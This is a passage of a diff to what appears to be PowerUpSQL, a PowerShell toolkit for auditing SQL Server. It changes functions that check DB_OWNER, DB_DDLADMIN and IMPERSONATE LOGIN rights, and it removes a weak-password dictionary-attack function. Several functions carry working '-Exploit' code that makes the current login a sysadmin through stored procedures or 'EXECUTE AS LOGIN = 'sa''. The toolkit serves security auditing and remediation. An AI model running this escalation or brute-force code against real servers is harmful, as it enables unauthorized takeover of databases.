using DB_OWNER permissions..." - # Add to report example - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, "$Details$Dependancies", $Reference, $Author) - } - else - { - $IsExploitable = 'No' + $SpQuery = "CREATE PROCEDURE sp_elevate_me + WITH EXECUTE AS OWNER + AS + begin + EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin' + end;" - # Add to report example - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } + # Add sp_elevate_me stored procedure + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "$SpQuery" -SuppressVerbose -Database $DatabaseTarget - # ----------------------------------------------------------------- - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role - # ----------------------------------------------------------------- + # Run sp_elevate_me stored procedure + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget - if($Exploit -and $IsExploitable -eq 'Yes') + # Remove sp_elevate_me stored procedure + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'DROP PROC sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget + + # Verify the login was added successfully + $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPostCheck -eq 1) + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" + $Exploited = 'Yes' + } + else + { + + } + } + else + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." + } + + #Add record + $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + else { - Write-Verbose -Message "$Instance : - No server escalation method is available at this time." + #Add record + $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } + else + { + #Add record + Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." + $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database, but this was not exploitable." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } } } } - else - { - # Status user - Write-Verbose -Message "$Instance : - The current login doesn't have the CREATE PROCEDURE permission in any databases." - } # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" } End @@ -11188,107 +22673,57 @@ Function Invoke-SQLAuditPrivCreateProcedure # --------------------------------------- -# Invoke-SQLAuditWeakLoginPw +# Invoke-SQLAuditRoleDbDdlAdmin # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditWeakLoginPw +Function Invoke-SQLAuditRoleDbDdlAdmin { <# .SYNOPSIS - Check if the current login has the db_owner role in any databases. + Check if the current user has the db_ddladmin role in any databases. .PARAMETER Username - Known SQL Server login to obtain a list of logins with for testing. - .PARAMETER TestUsername SQL Server or domain account to authenticate with. - .PARAMETER UserFile - Path to list of users to use. One per line. .PARAMETER Password - Known SQL Server login password to obtain a list of logins with for testing. - .PARAMETER TestPassword - Password to test provided or discovered logins with. - .PARAMETER PassFile - Path to list of password to use. One per line. + SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER NoUserAsPass - Don't try to login using the login name as the password. - .PARAMETER NoUserEnum - Don't try to enumerate logins to test. - .PARAMETER StartId - Start id for fuzzing login IDs when authenticating as a least privilege login. - .PARAMETER EndId - End id for fuzzing login IDs when authenticating as a least privilege login. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditWeakLoginPw -Username myuser -Password mypassword + PS C:\> Invoke-SQLAuditRoleDbDdlAdmin -Instance SQLServer1\STANDARDDEV2014 -username myuser -password mypassword ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : Weak Login Password - Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. - Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. - Severity : High - IsVulnerable : Yes - IsExploitable : Yes - Exploited : No - ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. - Details : The testuser (Not Sysadmin) is configured with the password testuser. - Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx - Author : Scott Sutherland (@_nullbind), NetSPI 2016 - - ComputerName : SQLServer1 - Instance : SQLServer1\Express - Vulnerability : Weak Login Password - Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. - Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. - Severity : High + Vulnerability : DATABASE ROLE - DB_DDLADMIN + Description : The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted + and owned by a sysadmin, or if a custom assembly can be loaded. + Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed + with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser' + Severity : Medium IsVulnerable : Yes - IsExploitable : Yes + IsExploitable : No Exploited : No - ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. - Details : The testadmin (Sysadmin) is configured with the password testadmin. - Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx + ExploitCmd : No exploit command is available at this time, but a custom assesmbly could be used. + Details : myuser has the DB_DDLADMIN role in the testdb database. + Reference : https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE - PS C:\> Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbDdlAdmin -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Known SQL Server login to fuzz logins with.')] + HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Username to test.')] - [string]$TestUsername = 'sa', - - [Parameter(Mandatory = $false, - HelpMessage = 'Path to list of users to use. One per line.')] - [string]$UserFile, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Known SQL Server password to fuzz logins with.')] + HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server password to attempt to login with.')] - [string]$TestPassword = 'password', - - [Parameter(Mandatory = $false, - HelpMessage = 'Path to list of passwords to use. One per line.')] - [string]$PassFile, - - [Parameter(Mandatory = $false, - HelpMessage = 'User is tested as pass by default. This setting disables it.')] - [switch]$NoUserAsPass, - [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] @@ -11300,21 +22735,9 @@ Function Invoke-SQLAuditWeakLoginPw HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, - [Parameter(Mandatory = $false, - HelpMessage = "Don't attempt to enumerate logins from the server.")] - [switch]$NoUserEnum, - - [Parameter(Mandatory = $false, - HelpMessage = 'Start id for fuzzing login IDs.')] - [int]$StartId = 1, - - [Parameter(Mandatory = $false, - HelpMessage = 'End id for fuzzing login IDss.')] - [int]$EndId = 500, - [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] - [switch]$NoOutput, + [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] @@ -11343,7 +22766,7 @@ Function Invoke-SQLAuditWeakLoginPw Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Weak Login Password" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_DDLAMDIN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -11352,20 +22775,26 @@ Function Invoke-SQLAuditWeakLoginPw if(-not $TestConnection) { # Status user - Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password." + Write-Verbose -Message "$Instance : CONNECTION FAILED" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" Return } else { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } - # Grab server information + # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName - $CurrentUSerSysadmin = $ServerInfo.IsSysadmin + $CurrentLogin = $ServerInfo.CurrentLogin + $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose + $CurrentPrincpalList = @() + $CurrentPrincpalList += $CurrentLogin + $CurrentPrincpalList += 'Public' + $CurrentLoginRoles | ForEach-Object -Process { + $CurrentPrincpalList += $_.RolePrincipalName + } # -------------------------------------------- # Set function meta data for report output @@ -11378,290 +22807,115 @@ Function Invoke-SQLAuditWeakLoginPw { $TestMode = 'Audit' } - $Vulnerability = 'Weak Login Password' - $Description = 'One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to.' - $Remediation = 'Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.' - $Severity = 'High' + $Vulnerability = 'DATABASE ROLE - DB_DDLADMIN' + $Description = 'The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin, or if a custom assembly can be loaded.' + $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser'" + $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = 'Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.' + $ExploitCmd = 'No exploit command is available at this time, but a custom assesmbly could be used.' $Details = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms161959.aspx' + $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted. Or it must be possible to load a custom assembly configured for external access.' + $Reference = 'https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability - # Note: Typically a missing patch or weak configuration - # ----------------------------------------------------------------- - - # Create empty user / password lists - $LoginList = @() - $PasswordList = @() - - # Get logins for testing - file - if($UserFile) - { - Write-Verbose -Message "$Instance - Getting logins from file..." - Get-Content -Path $UserFile | - ForEach-Object -Process { - $LoginList += $_ - } - } - - # Get logins for testing - variable - if($TestUsername) - { - Write-Verbose -Message "$Instance - Getting supplied login..." - $LoginList += $TestUsername - } - - # Get logins for testing - fuzzed - if(-not $NoUserEnum) - { - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - # Check if sysadmin - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin -eq 'Yes') - { - # Query for logins - Write-Verbose -Message "$Instance - Getting list of logins..." - Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | - Where-Object -FilterScript { - $_.PrincipalType -eq 'SQL_LOGIN' - } | - Select-Object -Property PrincipalName -ExpandProperty PrincipalName | - ForEach-Object -Process { - $LoginList += $_ - } - } - else - { - # Fuzz logins - Write-Verbose -Message "$Instance - Fuzzing principal IDs $StartId to $EndId..." - Get-SQLFuzzServerLogin -Instance $Instance -GetPrincipalType -Username $Username -Password $Password -Credential $Credential -StartId $StartId -EndId $EndId -SuppressVerbose | - Where-Object -FilterScript { - $_.PrincipleType -eq 'SQL Login' - } | - Select-Object -Property PrincipleName -ExpandProperty PrincipleName | - ForEach-Object -Process { - $LoginList += $_ - } - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance - Connection Failed - Could not authenticate with provided credentials." - } - return - } - } - - # Check for users or return - count array - if($LoginList.count -eq 0 -and (-not $FuzzLogins)) - { - Write-Verbose -Message "$Instance - No logins have been provided." - return - } - - # Get passwords for testing - file - if($PassFile) - { - Write-Verbose -Message "$Instance - Getting password from file..." - Get-Content -Path $PassFile | - ForEach-Object -Process { - $PasswordList += $_ - } - } - - # Get passwords for testing - variable - if($TestPassword) - { - Write-Verbose -Message "$Instance - Getting supplied password..." - $PasswordList += $TestPassword - } - - # Check for provided passwords - if($PasswordList.count -eq 0 -and (-not $UserAsPass)) - { - Write-Verbose -Message "$Instance - No password have been provided." - return - } - - # Iternate through logins and perform dictionary attack - Write-Verbose -Message "$Instance - Performing dictionary attack..." - $LoginList | - Select-Object -Unique | - ForEach-Object -Process { - $TargetLogin = $_ - $PasswordList | - Select-Object -Unique | - ForEach-Object -Process { - $TargetPassword = $_ - - $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | - Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestPass) - { - # Check if guess credential is a sysadmin - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin -eq 'Yes') - { - $SysadminStatus = 'Sysadmin' - } - else - { - $SysadminStatus = 'Not Sysadmin' - } - - Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetPassword" - - if($Exploit) - { - Write-Verbose -Message "$Instance - Trying to make you a sysadmin..." + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- - # Check if the current login is a sysadmin - $IsSysadmin1 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin1 -eq 'Yes') - { - Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." - } - else - { - Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." + # Iterate through each current login and their associated roles + $CurrentPrincpalList| + ForEach-Object -Process { + # Check if login or role has the DB_DDLADMIN roles in any databases + $DBDDLADMIN = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_DDLADMIN -PrincipalName $_ -SuppressVerbose - # Add current user as sysadmin if login was successful - Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetPassword -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- - # Check if the current login is a sysadmin again - $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin2 -eq 'Yes') - { - $Exploited = 'Yes' - Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." - } - else - { - $Exploited = 'No' - Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." - } - } - } + # Check for db ownerships + if($DBDDLADMIN) + { + # Add an entry for each database where the user has the DB_DDLADMIN role + $DBDDLADMIN| + ForEach-Object -Process { + $DatabaseTarget = $_.DatabaseName + $PrincipalTarget = $_.PrincipalName - # Add record - $Details = "The $TargetLogin ($SysadminStatus) is configured with the password $TargetPassword." + Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." $IsVulnerable = 'Yes' - $IsExploitable = 'Yes' - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - else - { - Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetPassword" - } - } - } - # Test user as pass - if(-not $NoUserAsPass) - { - $LoginList | - Select-Object -Unique | - ForEach-Object -Process { - $TargetLogin = $_ - $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | - Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestPass) - { - # Check if user/name combo has sysadmin - $IsSysadmin3 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin3 -eq 'Yes') - { - $SysadminStatus = 'Sysadmin' - } - else - { - $SysadminStatus = 'Not Sysadmin' + # Check if associated database is trusted and the owner is a sysadmin + $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { + $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 } - Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetLogin" - - if(($Exploit) -and $IsSysadmin3 -eq 'Yes') + if($Depends) { - # Check if the current login is a sysadmin - $IsSysadmin4 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin4 -eq 'Yes') - { - Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." - } - else + $IsExploitable = 'No' + Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." + + # ----------------------------------------------------------------- + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role + # ----------------------------------------------------------------- + if($Exploit) { - Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." + # Check if user is already a sysadmin + $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPreCheck -ne 1) + { + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." + Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions..." - # Add current user as sysadmin if login was successful - Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetLogin -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose + # Attempt to add the current login to sysadmins fixed server role + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose - # Check if the current login is a sysadmin again - $IsSysadmin5 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - if($IsSysadmin5 -eq 'Yes') - { - $Exploited = 'Yes' - Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." + # Verify the login was added successfully + $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPostCheck -eq 1) + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" + $Exploited = 'Yes' + } + else + { + + } } else { - $Exploited = 'No' - Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." + Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." } + + #Add record + $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + else + { + #Add record + $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } - - # Add record - $Details = "The $TargetLogin ($SysadminStatus) principal is configured with the password $TargetLogin." - $IsVulnerable = 'Yes' - $IsExploitable = 'Yes' - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - else - { - Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetLogin" + else + { + #Add record + Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." + $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database, but this was not exploitable." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } } } } - - # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution - # ----------------------------------------------------------------- - # $IsExploitable = "No" or $IsExploitable = "Yes" - # Check if the link is alive and verify connection + check if sysadmin - - - # ----------------------------------------------------------------- - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role - # ----------------------------------------------------------------- - # $Exploited = "No" or $Exploited = "Yes" - check if login is a sysadmin - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" } End @@ -11669,21 +22923,21 @@ Function Invoke-SQLAuditWeakLoginPw # Return data if ( -not $NoOutput) { - Return $TblData | Sort-Object -Property computername, instance, details + Return $TblData } } } -# --------------------------------------- -# Invoke-SQLAuditRoleDbOwner -# --------------------------------------- +# ----------------------------------- +# Invoke-SQLAuditPrivImpersonateLogin +# ----------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditRoleDbOwner +Function Invoke-SQLAuditPrivImpersonateLogin { <# .SYNOPSIS - Check if the current login has the db_owner role in any databases. + Check if the current login has the IMPERSONATE permission on any sysadmin logins. Attempt to use permission to obtain sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -11692,28 +22946,46 @@ Function Invoke-SQLAuditRoleDbOwner SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER NoOutput + Don't output anything. .PARAMETER Exploit - Exploit vulnerable issues. + Exploit vulnerable issues + .PARAMETER Nested + Exploit Nested Impersonation Capabilites .EXAMPLE - PS C:\> Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword + PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : DATABASE ROLE - DB_OWNER - Description : The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and - owned by a sysadmin. - Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with - a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser' - Severity : Medium + Vulnerability : PERMISSION - IMPERSONATE LOGIN + Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. + Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON + Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] + Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No - ExploitCmd : Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword -Exploit - Details : myuser has the DB_OWNER role in the testdb database. - Reference : https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx + ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit + Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. + Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbOwner -Verbose + PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! -Exploit + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : PERMISSION - IMPERSONATE LOGIN + Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. + Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON + Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] + Severity : High + IsVulnerable : Yes + IsExploitable : Yes + Exploited : Yes + ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit + Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. + Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx + Author : Scott Sutherland (@_nullbind), NetSPI 2016 #> [CmdletBinding()] Param( @@ -11728,7 +23000,6 @@ Function Invoke-SQLAuditRoleDbOwner [string]$Password, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, @@ -11744,7 +23015,11 @@ Function Invoke-SQLAuditRoleDbOwner [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit + [switch]$Exploit, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit Nested Impersonation Capabilites.')] + [switch]$Nested ) Begin @@ -11768,8 +23043,17 @@ Function Invoke-SQLAuditRoleDbOwner Process { - # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Status user + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -11778,30 +23062,22 @@ Function Invoke-SQLAuditRoleDbOwner if(-not $TestConnection) { # Status user - Write-Verbose -Message "$Instance : CONNECTION FAILED" - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" Return } else { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS" + Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } - # Grab server, login, and role information + # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin - $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose - $CurrentPrincpalList = @() - $CurrentPrincpalList += $CurrentLogin - $CurrentPrincpalList += 'Public' - $CurrentLoginRoles 